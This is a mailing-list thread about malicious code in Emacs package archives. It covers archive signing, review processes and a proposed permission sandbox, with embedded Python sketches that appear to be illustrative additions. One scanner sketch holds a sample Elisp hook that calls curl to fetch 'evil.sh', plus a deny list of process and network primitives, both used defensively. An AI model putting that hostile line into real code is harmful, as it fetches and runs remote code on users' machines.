Discussion:
Security of the Emacs package system: ELPA, MELPA and Marmalade
Matthias Dahl
2013-09-23 07:30:35 UTC
Permalink
Hello @all,

I know there has been a thread about (more or less) this topic sometime
last year, iirc. But I was unable to find something current, so I hope
it is okay to raise a few questions and ideas about this subject.

As it stands, most Emacs users I guess install quite a few packages from
various sources (git repo, elpa, melpa, ...) to mold Emacs to their very
specific needs and workflow. The same naturally goes for me.

Right now, the only way to make sure there is no malicious code hidden
in those packages is to check each one manually during the initial
installation as well as on each update... which can be a very
time-intensive task, and not every person using Emacs is an Elisp guru
who can really spot every malicious code fragment. Especially since more
and more new projects recommend installing their package through the
package management system (especially MELPA), which makes it even easier
to install something without checking it first.

Signed packages on the package server (e.g. ELPA) make sense if the
signing is done externally and a security check is performed on the
package in question before signing. For MELPA this is an even harder
problem to solve: since it is fully automated, even signing the
package is out of the question, as it would not add much value.

Nevertheless, I think this is a serious problem and a security incident
waiting to happen... it is just a matter of time, imho.

The best solution imho would be that each package on a package server,
no matter which one, is reviewed before being available either through a
dedicated staff of volunteers or through a more open process that makes
use of the user base somehow (which could be very difficult in terms of
trustworthiness). Unfortunately, I see this as something that needs
annual financial funding and hard for the Emacs community to achieve. I
might be wrong - and I'd like to be, honestly.

So, I'd like to propose the following as at least some measure of
protection and a first step toward making the package system more
secure: each package gets a security context that details its own
permissions, much like e.g. an Android app. That context is permanent,
meaning that if a user action enters package 1 with a narrow permission
set, which in turn uses some functions of a package 2 (which has a
rather wide permission set), only the original narrow permission set
will be applied and available. This makes the implementation easier and
the system more robust against possible workarounds/exploits, imho.
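To make the proposal concrete, here is a minimal sketch of the "permanent context" rule, written in Python purely for illustration (the class, permission names and API here are hypothetical, not anything existing in Emacs): a call from a narrow context into a more privileged package keeps only the intersection of the two permission sets.

```python
# Conceptual sketch of the proposed permanent security context.
# Permission names and the SecurityContext API are invented for
# illustration; an Elisp implementation would differ in detail.

class SecurityContext:
    def __init__(self, granted):
        self.granted = frozenset(granted)

    def enter(self, callee_granted):
        # Narrowing only: calling into a package with a wider
        # permission set never widens the effective permissions.
        return SecurityContext(self.granted & frozenset(callee_granted))

    def check(self, permission):
        # Emacs could call this before any security-sensitive
        # primitive, inform the user on failure, and stop execution.
        if permission not in self.granted:
            raise PermissionError(f"permission violation: {permission}")

# Package 1 runs with only buffer access...
ctx = SecurityContext({"buffers"})
# ...and calls into package 2, which was granted network access too.
inner = ctx.enter({"buffers", "network"})
assert inner.granted == frozenset({"buffers"})  # still narrow
```

The intersection rule is what makes the context "permanent": no call chain, however convoluted, can accumulate permissions beyond what the original user action started with.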

There are a lot of packages that don't need access to the filesystem,
the network or other security-sensitive areas. If a package that did
not have those permissions in the first place got hacked, Emacs could
detect the violation, inform the user and end the execution.

Naturally, this also implies that the defined permissions should only
be alterable on the package server by an authoritative person, and not
by the package itself. Also, if permissions changed, the user would
be informed by Emacs and asked for permission.

This would need a lot more detail, like what kinds of permissions
should be defined (granularity, ...) and how. I'm just throwing my
thoughts into the community hive mind, very much hoping not to get
crushed fiercely. :)

Basically, all I want to achieve with this mail is to get a discussion
going about this topic which hopefully could lead to a more secure and
even better Emacs package system.

Sorry for the wall of text... and thanks for listening, um, reading. :)
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stefan Monnier
2013-09-23 14:17:33 UTC
Permalink
Post by Matthias Dahl
I know there has been a thread about (more or less) this topic sometime
last year, iirc. But I was unable to find something current, so I hope
it is okay to raise a few questions and ideas about this subject.
The current state, AFAIK is that we decided that ELPA servers should
put *.gpg signatures alongside their tarballs and other files, signed
with an "archive" key. This signature can be used to check that the
package you get indeed comes from that archive.

In terms of code, it's not implemented yet, AFAIK (IIRC Ted is working
on it).
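For readers unfamiliar with the mechanism, the flow of such a detached-signature check can be sketched as follows. This is an illustration only: a real client would invoke GnuPG against a *.gpg signature file sitting next to the tarball; here Python's hmac module stands in for the archive key so the sketch is self-contained and runnable.

```python
# Sketch of the archive-signature flow described above. HMAC is a
# stand-in for GPG here purely so the example runs on its own; the
# actual scheme uses asymmetric signatures made with an archive key.
import hashlib
import hmac

ARCHIVE_KEY = b"hypothetical-archive-key"  # stands in for the GPG key

def sign_tarball(data: bytes) -> bytes:
    # Server side: produce the detached signature published
    # alongside the tarball.
    return hmac.new(ARCHIVE_KEY, data, hashlib.sha256).digest()

def verify_tarball(data: bytes, signature: bytes) -> bool:
    # Client side: check that the download really comes from the
    # archive (it says nothing about a compromised upstream).
    expected = sign_tarball(data)
    return hmac.compare_digest(expected, signature)

tarball = b"(fake package contents)"
sig = sign_tarball(tarball)
assert verify_tarball(tarball, sig)
assert not verify_tarball(tarball + b"tampered", sig)
```

As the thread goes on to note, this authenticates the archive, not the code: a malicious commit accepted upstream would be signed just as happily.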
Post by Matthias Dahl
The best solution imho would be that each package on a package server,
no matter which one, is reviewed before being available either through a
dedicated staff of volunteers or through a more open process that makes
use of the user base somehow (which could be very difficult in terms of
trustworthiness).
Not gonna happen, indeed. It doesn't happen for Debian either, FWIW, so
it's usually not considered a very major problem.

W.r.t. GNU ELPA packages, every commit installed sends an email
containing the diff to a mailing list to which some people are
subscribed, so there is a bit of review there, but it's far from
sufficient to prevent the introduction of security problems.
Post by Matthias Dahl
So, I'd like to propose the following as at least some measure of
protection and a first step in making the package system more secure: A
package gets a security context which details its very own permissions
just like e.g. an Android app. That context is permanent, meaning that
Sandboxing could be an interesting direction, but it seems very
difficult: not only will it be a non-trivial amount of implementation
work, but even just designing it will be difficult, due to the current
nature of Emacs's design, where everything is global and shared.


Stefan
Matthias Dahl
2013-09-25 08:11:41 UTC
Permalink
Hello Stefan...
Post by Stefan Monnier
The current state, AFAIK is that we decided that ELPA servers should
put *.gpg signatures alongside their tarballs and other files, signed
with an "archive" key. This signature can be used to check that the
package you get indeed comes from that archive.
Which is absolutely fabulous and will make it harder to tamper with
packages on one of the package repositories. Suffice it to say, this
won't do anything to prevent malicious code from (a hacked) upstream
slipping through -- and this approach is not feasible for MELPA, which
is becoming (afaict) more and more popular these days.
Post by Stefan Monnier
Not gonna happen, indeed. It doesn't happen for Debian either, FWIW, so
it's usually not considered as a very major problem.
The situation with Debian (and any other well-maintained distro) is a
bit different, imho. There are dedicated distro maintainers taking care
of their packages, and some distros also have a QA procedure. There are
usually just more eyes watching and testing. Also, a lot of those
upstream projects have a team of people working on them, which makes
tampering on a decent dvcs easier to spot.

In the Emacs ecosystem, people take code from the wiki or from any of
the package repositories, usually knowing nothing about the single
person who wrote said package... especially nothing about how the
security of their accounts is handled in terms of passwords, pubkeys
and whatever. So a GitHub account could get hacked and malicious code
placed without the maintainer even noticing for a very long period,
because he just moved on. And so on...

Granted, those are all absolutely worst-case scenarios and one could
argue for days about how likely and relevant such incidents really are.

But apart from that, there is naturally also the other side: Security
leaks due to bad code caused simply by inexperience which could be
exploited.
Post by Stefan Monnier
Sandboxing could be an interesting direction, but it seems very
difficult: not only it'll be a non-trivial amount of implementation
work, but even just designing it will be difficult, due to the current
nature of Emacs's design where everything is global and shared.
I've been thinking about this really hard as well. And I have to admit,
I'm not (at least not yet) an Emacs/Elisp expert. But not every package
needs to overwrite some core functions.

One idea to throw into the discussion: we could differentiate between
core and non-core functions. This would allow the introduction of a new
permission like "redefine core function"... which naturally is like
granting a program root access.

A core function could be, imho, any function that comes bundled with
Emacs when it starts up - possibly including init.el and the user's
modifications. If the user decides to load packages on his own, we could
provide a new argument to load-file to pass a permission context in.

And naturally, to avoid any privilege escalation, we'd only allow
permission narrowing and never widening. But I already touched on that
in my last mail.
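The load-time side of this could be sketched as below, again in Python for illustration only (the extra load argument, the permission names and the notion of a "core" context are all hypothetical): an inherited context may only be narrowed, and any request to widen it is refused outright.

```python
# Sketch of the proposed load-file extension: code is loaded under an
# explicit permission context, and a nested load may only narrow,
# never widen, what it inherits. All names here are invented.

CORE_PERMISSIONS = frozenset({"filesystem", "network", "processes",
                              "redefine-core"})

def load_with_context(inherited, requested):
    """Return the context the loaded code will run under."""
    requested = frozenset(requested)
    if not requested <= inherited:
        # Asking for more than the loader holds is a privilege
        # escalation attempt: refuse rather than silently clamp.
        raise PermissionError(
            f"widening refused: {sorted(requested - inherited)}")
    return requested

# init.el and the user's own code run as "core"...
user_ctx = load_with_context(CORE_PERMISSIONS, {"filesystem", "network"})
# ...and a package loaded from there may narrow further, not widen.
pkg_ctx = load_with_context(user_ctx, {"filesystem"})
assert pkg_ctx == frozenset({"filesystem"})
```

Refusing (rather than silently clamping) a widening request has the nice side effect of surfacing the escalation attempt to the user, which matches the "inform the user and end the execution" idea earlier in the thread.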

I agree, such a "sandbox" project would be quite an endeavour to take on
and would require a great deal of careful designing and implementing.

The question is this: Would there be any interest and motivation from
the current dev community to drive such an endeavour? Because otherwise
such a project would be doomed to fail, imho.

Sorry for my late reply, by the way. I am currently fighting a nasty
kind of human virus. I already tried putting my hand on the CPU and
running an anti-virus scanner which surprisingly did not work. ;-)

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stefan Monnier
2013-09-25 17:00:40 UTC
Permalink
Post by Matthias Dahl
But apart from that, there is naturally also the other side: Security
leaks due to bad code caused simply by inexperience which could be
exploited.
Security problems in Emacs are everywhere, indeed. We just try to plug
the most glaring holes.
Post by Matthias Dahl
One idea thrown into discussion: We could differentiate between core and
non-core functions. This would allow the introduction of a new
permission like "re-define core function"... which naturally is like
granting a program root access.
But there's also the never-ending list of hooks, plus dynamic scoping,
and of course the problem of defining and tracking the "principal"
corresponding to the code currently running.

If you think, for example, of a typical package providing a major mode
for a programming language, the "core" functionality can be provided
under the constraint that it can "only affect the current buffer" or
"only define new functions", but it will have to be able to set
buffer-local variables and hooks and define a major-mode map, which
might rebind global bindings, thus potentially tricking you into
running code you did not intend.

And it'll naturally want to provide some support for running the
compiler/interpreter for that language, so it'll require the ability to
run an external command, which of course raises the question of how to
make sure that external command doesn't send a tarball of your home
directory to Google.


Stefan
Matthias Dahl
2013-09-25 18:31:05 UTC
Permalink
Hello Stefan...
Post by Stefan Monnier
Security problems in Emacs are everywhere, indeed.
Actually, not quite the statement one ever wants to read about the
software one loves to use. ;)

The question that is bugging me now: why is that? Since Emacs, imho,
addresses a more technical audience and is maintained by professionals,
I wouldn't have expected such a thing. Especially since it is not
written in such a common language that everyone learns during their
first years in high school or university, which implies a certain level
of interest and knowledge in programming if one decides to tackle Lisp.

Regarding your examples: you are absolutely right, it is a tough
problem to solve... especially without sacrificing any of the freedom
that everyone has come to love about Emacs. And it would require more
than just one person trying to get this done.

Zooming out a bit: a major mode that wants to run external programs
could either declare them through its permission file, which would
_not_ be part of its package but rather properties on the package
server that can only be changed by its staff. Or Emacs could ask the
user the first time whether it is okay to execute the following
programs with arguments xyz, and remember that choice. All of this
security-relevant data should naturally go into a separate file that
Emacs protects from access, so a plugin could not tamper with the
datastore and gain privileges that way after a restart.

Hooks. If a security context is attached to a function (let's say
transitively through its package):

- function A is running with all permissions
- function A calls its hook
- each hook is executed within its own security context (=> narrowing)

I'm just throwing my thoughts into the mix at this time. All this would
need a lot more thought and work, obviously. But I honestly think this
would be a goal worth pursuing, since security should never be taken
lightly, imho. Nevertheless, if there is zero traction from the
community, such a project would be doomed to fail. And right now, we
are the only two in this discussion, which could be seen as a lack of
interest. :(

Don't get me wrong, I'm not complaining or trying to force something.
I'm just trying to raise a little awareness and maybe ignite some
discussion that potentially leads to a solution that improves overall
security.

Thanks Stefan by the way for taking the time. Much appreciated.

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Bastien
2013-09-25 22:42:27 UTC
Permalink
Hi Matthias,
Post by Matthias Dahl
The question that is bugging me now: Why is that? Since Emacs, imho,
addresses a more technical audience and is maintained by professionals,
I wouldn't expect such a thing, actually. Especially since it is not
written in such a common language that everyone learns during their
first years in high-school or university which implies a certain level
of interest and knowledge in programming if one decides to tackle lisp.
Don't forget those out there who are not educated at all in computer
science and who picked up Lisp just because they loved Emacs. I don't
think this is such a minority, and it may explain why many security
concerns (for which you *need* to study computer science) may have
been overlooked while Emacs was progressing.

2 cents of course,
--
Bastien
Matthias Dahl
2013-09-26 09:02:41 UTC
Permalink
Hello Bastien...
Post by Bastien
don't forget those out there who are not educated at all in computer
science and who picked up Lisp just because they loved Emacs. I don't
think this is such a minority, and this may explain why many security
concerns (for which you *need* to study computer science), may have
been overlooked while Emacs was progressing.
Interesting argument. Since Lisp is not such a common language, imho,
and not quite so easy to learn, I never would have guessed that people
without any kind of technical background actually chose to give Lisp a
shot just because they liked Emacs.

But actually, this should not affect the core code of Emacs itself at
all. That audience with a limited Lisp skillset should not get repo
write access in the first place, and everything handed in as a patch
goes through the community review process and is commented upon. So
there is a nice learning process for the Lisp initiate and QA for the
stuff that gets into Emacs.

Or am I overlooking something here?

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Bastien
2013-09-27 14:02:03 UTC
Permalink
Hi Matthias,
Post by Matthias Dahl
But actually this should not affect the core code of Emacs itself - at
all. That audience with a limited Lisp skillset should not get repo
write access in the first place and everything handed in as a patch gets
through the community review process and is commented upon. So there is
a nice learning process for the Lisp initiate and QA for the stuff that
gets into Emacs.
This is how I ended up in /etc/DEVEL.HUMOR (see at the bottom):
http://git.savannah.gnu.org/cgit/emacs.git/plain/etc/DEVEL.HUMOR?h=trunk
Post by Matthias Dahl
Or am I overlooking something here?
Not really -- given enough eyeballs, all bugs are shallow, except
those bugs that only exist for some super-eyes out there, I guess.
--
Bastien
Matthias Dahl
2013-09-27 14:17:54 UTC
Permalink
Hello Bastien...
Post by Bastien
http://git.savannah.gnu.org/cgit/emacs.git/plain/etc/DEVEL.HUMOR?h=trunk
Did not know about that file. Nice. :-)) But you didn't get your rights
revoked, did you? (sorry for asking, I know I am nosy)

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Bastien
2013-09-27 14:19:36 UTC
Permalink
Post by Matthias Dahl
Did not know about that file. Nice. :-)) But you didn't get your rights
revoked, did you? (sorry for asking, I know I am nosy)
Well, the joke was that I committed this bit in DEVEL.HUMOR myself...
sorry to spoil it :)
--
Bastien
Matthias Dahl
2013-09-27 18:29:39 UTC
Permalink
Hello Bastien...
Post by Bastien
Well, the joke was that I committed this bit in DEVEL.HUMOR myself...
sorry to spoil it :)
Aaaah, now it makes sense. :-)) Thanks for clearing that up. I hope that
it wasn't too obvious for anybody else. :)

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stefan Monnier
2013-09-26 01:09:42 UTC
Permalink
Post by Matthias Dahl
The question that is bugging me now: Why is that?
For the same reason it uses dynamic scoping, dynamic typing, hooks
galore, defadvice, ...
Emacs is about empowering the user.

Also it grew in a context where security was not a serious concern.
Post by Matthias Dahl
I'm just throwing my thoughts in the mix at this time. All this would
need a lot more thought and work, obviously. But I honestly think this
would be a goal worth pursuing since security should never be taken
lightly, imho.
To me, the problem is too ill-understood to be able to design a
workable solution. So I think the only way to attack the problem is to
perform experiments to get a feel for what might work and what problems
show up.


Stefan
Matthias Dahl
2013-09-26 09:02:46 UTC
Permalink
Hello Stefan...
Post by Stefan Monnier
Emacs is about empowering the user.
Sure. But all of that does not necessarily contradict security or make
the code full of security leaks / holes.
Post by Stefan Monnier
To me, the problem is too ill-understood to be able to design a workable
solution.
Agreed. It was never my intention in this discussion to find a solution,
just to start the discussion and the process that might lead to a
solution eventually down the road.
Post by Stefan Monnier
So I think the only way to attack the problem is to perform experiments
to get a feel for what might work and what problems show up.
Ah, justice. I knew this would come back to bite me. ;) I know that
since I am the one who started this discussion, it is expected of me
(or considered good manners) to volunteer to do so. And in all honesty,
I'd gladly jump right in... but my familiarity with the code base is
very far from sufficient for this. This is something for someone with a
very strong grasp of Elisp and Emacs, imho. :(

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Óscar Fuentes
2013-09-26 09:21:25 UTC
Permalink
Post by Matthias Dahl
Post by Stefan Monnier
Emacs is about empowering the user.
Sure. But all of that does not necessarily contradict security or make
the code full of security leaks / holes.
It does. Security, as implemented in practice, is about restricting
users/software from doing things or, at best, "informing" the users
about the implications of certain actions and asking for permission:
questions equivalent to "do you trust me?". I answered that question
once and for all the day I installed Emacs.
Stefan Monnier
2013-09-26 14:41:17 UTC
Permalink
Post by Matthias Dahl
Post by Stefan Monnier
So I think the only way to attack the problem is to perform experiments
to get a feel for what might work and what problems show up.
Ah, justice. I knew this would come back to me and bite me. ;) I know
that since I am the one who started this discussion, it is expected of
me (or considered good manners) that I volunteer to do so. And I'd in all
honesty gladly jump on in... but my familiarity with the code base is
very far from sufficient for this. This is something for someone with a
very strong grasp of Elisp and Emacs, imho. :(
I suggest you lead the charge while asking for help at the same time.
Concretely, you could do something along the following lines:
- decide on some set of rules that a package should follow; make those
  *very* simple (i.e. simplistic) for now, e.g. "can only access
  current-buffer".
- try to figure out a way to implement it (without regard for
  efficiency, for a start).
- see how it works with existing packages.
- try to write something nasty to see if your rules are actually useful.
- iterate the process.
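As a starting point for that experiment, even a crude static scan gets the iteration going. The sketch below is Python and illustrative only: the rule table is made up (though the function names are real Elisp primitives), and a serious version would walk the parsed forms rather than pattern-match the source text.

```python
# Simplistic first iteration of the rule check Stefan outlines:
# flag any call that the package's declared permissions don't cover.
# The rule set is hypothetical; the scanner is deliberately naive.
import re

RULES = {
    "filesystem": {"delete-file", "write-region", "insert-file-contents"},
    "network":    {"url-retrieve", "open-network-stream"},
    "processes":  {"call-process", "start-process", "shell-command"},
}

def violations(elisp_source, granted):
    # Everything guarded by a permission the package was NOT granted.
    denied = set().union(*(fns for perm, fns in RULES.items()
                           if perm not in granted))
    # Naive "call" detection: the symbol right after an open paren.
    called = set(re.findall(r"\(([a-z][a-z0-9-]*)", elisp_source))
    return sorted(called & denied)

code = '(defun evil-hook () (call-process "curl" nil nil nil "evil.sh"))'
assert violations(code, granted={"filesystem"}) == ["call-process"]
assert violations(code, granted={"processes"}) == []
```

Running this over existing packages (step three of the list above) would quickly show how coarse the rules are and where they break legitimate code, which is exactly the feedback the experiment is meant to produce.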
Post by Matthias Dahl
each and every plugin he installs. One can assume that the Emacs code
base does not contain any malicious code and is thus "secure" at least
in this regard. Naturally there are holes - known and unknown. The key,
The set of people with commit access to Emacs is the same as the set of
people with commit access to GNU ELPA (it includes more than a hundred
people, some of whom are not expert programmers). And both repositories
send diff emails for every commit installed in them.

So the main difference is that many more people clone/checkout the Emacs
repository than the GNU ELPA repository.


Stefan
Matthias Dahl
2013-09-27 14:17:50 UTC
Permalink
Hello Stefan...
Post by Stefan Monnier
I suggest you lead the charge while asking for help at the same time.
In all honesty, as others have mentioned as well, this is a tough nut
to crack and requires some intimate knowledge of Emacs and Lisp
internals to get right overall.

As much as it pains my ego to say: I'm not that guy. If we were talking
about C++, Python or whatever, I would still be hesitant due to the
huge codebase of Emacs, but at least I know those languages pretty darn
well, with all their ins and outs. I can absolutely not say the same
for Lisp.

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stefan Monnier
2013-09-27 15:47:49 UTC
Permalink
There are many different aspects to this discussion.

One is to try to come up with a technical way for Emacs's
implementation to prevent malicious code from harming the user via some
kind of sandboxing. While I do think we could hypothetically come up
with some kind of sandboxing that is sufficiently flexible to be usable
at least for some packages, I doubt we could make it really effective
against an attacker (i.e. I doubt we could plug all the holes).

So such a sandboxing would mostly work as a "sanity check" which can
catch coding errors/oversights rather than malicious code.

Another way to look at the problem is to perform code review.
By default, Emacs's package.el only accesses GNU ELPA, where the code
is not extensively reviewed, but where some attempts to install
malicious code would get caught.

So you could argue that the problem is not ELPA in general but
"unsupervised" archives such as MELPA. Based on this, another approach
(one which should not require as much knowledge of Emacs subtleties as
the design and implementation of a sandboxing system) would be to
provide a "safe MELPA alternative" where the changes are reviewed (to
some extent). Or maybe just hack on MELPA directly to try and set up
some kind of reviewing system.


Stefan
Richard Stallman
2013-09-28 14:15:51 UTC
Permalink
[ To any NSA and FBI agents reading my email: please consider
[ whether defending the US Constitution against all enemies,
[ foreign or domestic, requires you to follow Snowden's example.

I think that we should warn users that it is risky to use packages
from archives that don't supervise the code that gets put in them, or
that don't use signing.
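Such a warning could be driven by very little metadata per archive. A sketch follows; the per-archive flags are purely illustrative assumptions for the example, not real package.el metadata, and the classifications are just the ones debated in this thread.

```python
# Illustrative sketch of the warning suggested above: before
# installing, check whether an archive signs its contents and
# supervises what goes into it, and warn the user otherwise.
# The flags below are assumptions made up for this example.
ARCHIVES = {
    "gnu":       {"signed": True,  "supervised": True},
    "melpa":     {"signed": False, "supervised": False},
    "marmalade": {"signed": False, "supervised": False},
}

def install_warning(archive):
    meta = ARCHIVES.get(archive, {"signed": False, "supervised": False})
    problems = []
    if not meta["signed"]:
        problems.append("does not sign its packages")
    if not meta["supervised"]:
        problems.append("does not supervise uploaded code")
    if problems:
        return f"Warning: archive '{archive}' " + " and ".join(problems)
    return None  # nothing to warn about

assert install_warning("gnu") is None
assert "melpa" in install_warning("melpa")
```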
--
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
Use Ekiga or an ordinary phone call.
Matthias Dahl
2013-09-30 15:12:56 UTC
Permalink
Hello Richard...
Post by Richard Stallman
I think that we should warn users that it is risky to use packages
from archives that don't supervise the code that gets put in them, or
that don't use signing.
+1

But imho this would also include ELPA, because there is not really a
control process in place. A mail gets sent that some person from the
community then needs to thoroughly read/check; there is no guarantee
that anyone will actually do this.

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Richard Stallman
2013-09-30 21:11:24 UTC
Permalink
[ To any NSA and FBI agents reading my email: please consider
[ whether defending the US Constitution against all enemies,
[ foreign or domestic, requires you to follow Snowden's example.
Post by Richard Stallman
I think that we should warn users that it is risky to use packages
from archives that don't supervise the code that gets put in them, or
that don't use signing.
+1

But imho, this would also include ELPA because there is not really a
control process in place. A mail gets sent that some person from the
community needs to thoroughly read/check. There is no guarantee that
someone will actually do this.

I think we should maintain ELPA with the same level of care that we
apply to code in Emacs, and sign the downloads the same way GNU
packages are signed. Then we can tell people that they shouldn't
hesitate to download packages from ELPA.
--
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
Use Ekiga or an ordinary phone call.
Matthias Dahl
2013-09-30 15:31:21 UTC
Permalink
Hello Stefan...
Post by Stefan Monnier
[...]
So such a sandboxing would mostly work as a "sanity check" which can
catch coding errors/oversights rather than malicious code.
After this whole discussion I agree that a sandbox would not,
unfortunately, be the holy grail for this problem. I still think it
would be one measure that should be complemented with others and work
in concert with them to be more effective as a whole.
Post by Stefan Monnier
Another way to look at the problem is to perform code review.
Which would be very nice to have in general, naturally.
Post by Stefan Monnier
So you could argue that the problem is not ELPA in general but
"unsupervised" archives such as MELPA.
Excuse my bluntness, but this feels like pushing responsibility off
onto someone else. Neither ELPA, MELPA nor Marmalade provides a
sufficient reviewing process to be considered effective, imho. So all
of them are more or less in the same boat. Naturally, some of the
solutions that would work for ELPA could potentially be hard to do with
MELPA... but that is a different story.

I think a general solution that would benefit all, would be absolutely
desirable.

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stephen J. Turnbull
2013-09-26 01:12:56 UTC
Permalink
Post by Matthias Dahl
Hello Stefan...
Post by Stefan Monnier
Security problems in Emacs are everywhere, indeed.
Actually not quite the statement one wants to read _ever_ about the
software one loves to use. ;)
The question that is bugging me now: Why is that? Since Emacs, imho,
addresses a more technical audience and is maintained by professionals,
I wouldn't expect such a thing, actually.
Then your model of security is inadequate. Software is *inherently*
insecure. Any regular behavior provides an attack surface; large
amounts of regular behavior provide a large attack surface. A single
breach of the attack surface and you lose. Interfaces between
software systems are prolific sources of weak points.

Emacs provides a huge attack surface on the individual user *because*
it is so capable, and provides interfaces to so many other software
systems. That's all there is to it.

The fact that Emacs is mostly implemented in Lisp is also a security
feature, since it wraps, rather than calls directly, the system
functions. This means that although such functions are available
(which is an attack vector), serious security breaches such as
exploiting a buffer overflow are hard to engineer, and the operating
system is likely to be able to protect itself from attacks via Lisp.

By the same token, as long as individual users have little power (for
example, not being able to bind to privileged ports), they're
generally not attractive targets for such attacks. If they are
attacked (eg, to get a privilege escalation started), the attacker
will eschew use of Emacs and head straight for the C compiler. That,
combined with the relative security of Lisp itself, means that the
incentive for Emacs developers to put in the necessary effort for a
serious security audit and a complete redesign of the Lisp
implementation is rather low.
Post by Matthias Dahl
Hooks. If a security context is attached to a function (let's say
function A is running with all permissions
function A calls its hook
each hook is executed within its own security context (=> narrowing)
*pong* Function on function-hook doesn't have permission to frob.
Allow frob? (0 = no; 1 = just this time; 2 = always; -1 = never) _

But this is really self-defeating. Since hooks should in general be
empty by default, what you're saying is that a function the user has
probably explicitly specified, and may have written herself, should
run with less privilege than functions the user is only vaguely
aware of.

For example, I don't know who's broken, but every time my "smart"
phone upgrades, I have to re-login to my employer's wireless network.
And every time, I'm told that the certificate can't be tracked to a
trusted root. Of course the phone software is very little help in
figuring out what's wrong; it just shows the certificates. I know how
to trace the transitive trust, but even so, why should I trust a
self-signed root claiming to be the Japanese Ministry of Education,
Science, and Technology's IT department? These guys don't have
sufficient clue to get a path to a universally trusted root! I also
am aware that sub-authorities have gone rogue or been hacked in the
past. But ... I enable. Wouldn't you?

Definitely my colleagues have no clue. They don't even think about it
any more, so many servers present keys for a parent domain or sister
domain. Even the CS Department (the initial entry point of the first
large-scale virus infection at my university after the virus checker
was installed on the mail gateway). Most of these guys are theorists
(including in crypto where you'd think they'd be aware -- but no,
they're not) and have zero sysadmin experience (and probably haven't
read The Cuckoo's Egg).
Post by Matthias Dahl
Don't get me wrong, I'm not complaining or trying to force something.
Just trying raise a little awareness and maybe ignite some discussion
that potentially leads to a solution that improves overall
security.
I'm sure the leadership is aware. But the basic answer is the same as
in any security context: avoid exposing regular behavior to potential
enemies, and establish a community watch on community resources.
Matthias Dahl
2013-09-26 09:02:32 UTC
Permalink
Hello Stephen...
Post by Stephen J. Turnbull
Then your model of security is inadequate. Software is *inherently*
insecure.
Agreed. But if someone says there are security leaks all over the place,
that is a different story. This implies those are tolerated for various
reasons. But they do exist and should be fixed, nevertheless.

I would _never_ consider any software secure. But if known holes exist
and are not fixed, that is a different story. It also implies that code
which lacks in quality slips in... knowingly.
Post by Stephen J. Turnbull
Emacs provides a huge attack surface on the individual user *because*
it is so capable, and provides interfaces to so many other software
systems. That's all there is to it.
Agreed. But this doesn't imply that the user should be powerless against
each and every plugin he installs. One can assume that the Emacs code
base does not contain any malicious code and is thus "secure" at least
in this regard. Naturally there are holes - known and unknown. The key,
imho, is to empower the user to have more control over plugins he needs
to install. This adds a line of defense that can be built upon.

Right now there is absolutely nothing stopping a hacked plugin from doing
just about anything until the community or the user somehow notices this.
Post by Stephen J. Turnbull
If they are attacked (eg, to get a privilege escalation started), the attacker
will eschew use of Emacs and head straight for the C compiler.
Emacs can "easily" be used through a malicious plugin to tamper with the
user environment and thus gain all kinds of access and data. It does not
really need to exploit any security hole / leak.
Post by Stephen J. Turnbull
That,
combined with the relative security of Lisp itself, means that the
incentive for Emacs developers to put in the necessary effort for a
serious security audit and a complete redesign of the Lisp
implementation is rather low.
That is only half of the story, though. My concern mainly lies with the
"plugin" system. Putting some kind of defense there. And yes, in the end
this would also possibly mean to harden Emacs here and there to protect
this defense system from being tampered with.

Things are more intertwined than your point of view suggests.
Post by Stephen J. Turnbull
But this is really self-defeating. Since in general hooks should be
empty by default, what you're saying is that a function that the user
has probably explicitly specified and may have written herself should
run with less privilege than functions that the user is only vaguely
aware of.
Those were only thoughts; I was just thinking aloud. :) Again, all of
this would need a lot more detailing and testing, obviously.

But in general, I would consider user code in the same category as core
code, thus full privileges. Now if a function with less privileges
called a hook that contains a function with required higher privileges,
that would naturally be a very valid use-case that would need further
investigation for a suitable solution.
Post by Stephen J. Turnbull
But ... I enable. Wouldn't you?
But at least you get a warning. You get information. You can make an
informed decision at that time. You do know who you are dealing with,
you can somehow at least rudimentarily assess the risks for this very
specific case.

With Emacs, you can either review each and every change for each and
every plugin you have installed - or you are completely on your own.
There are no warnings. No checks. Nothing.

To expand on your good example: This would be like you had to check the
certs all by yourself beforehand by logging in, tracing and validating
everything. If you did not do so, well, your choice... and there would
be no warning or checks. Nothing.

And not everybody uses self-signed certs, by the way. ;) Even though the
cert system is broken in several aspects, it still provides some form of
valuable clue as to whether a site (in the most general meaning of the
term) is most likely "trustworthy" or not.
Post by Stephen J. Turnbull
I'm sure the leadership is aware. But the basic answer is the same as
in any security context: avoid exposing regular behavior to potential
enemies, and establish a community watch on community resources.
And what would you suggest in terms of ELPA / Marmalade and MELPA and
the package system in general based on this...?

By the way, thanks for your input. It is very much appreciated.

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stephen J. Turnbull
2013-09-27 07:10:33 UTC
Permalink
Post by Matthias Dahl
Post by Stephen J. Turnbull
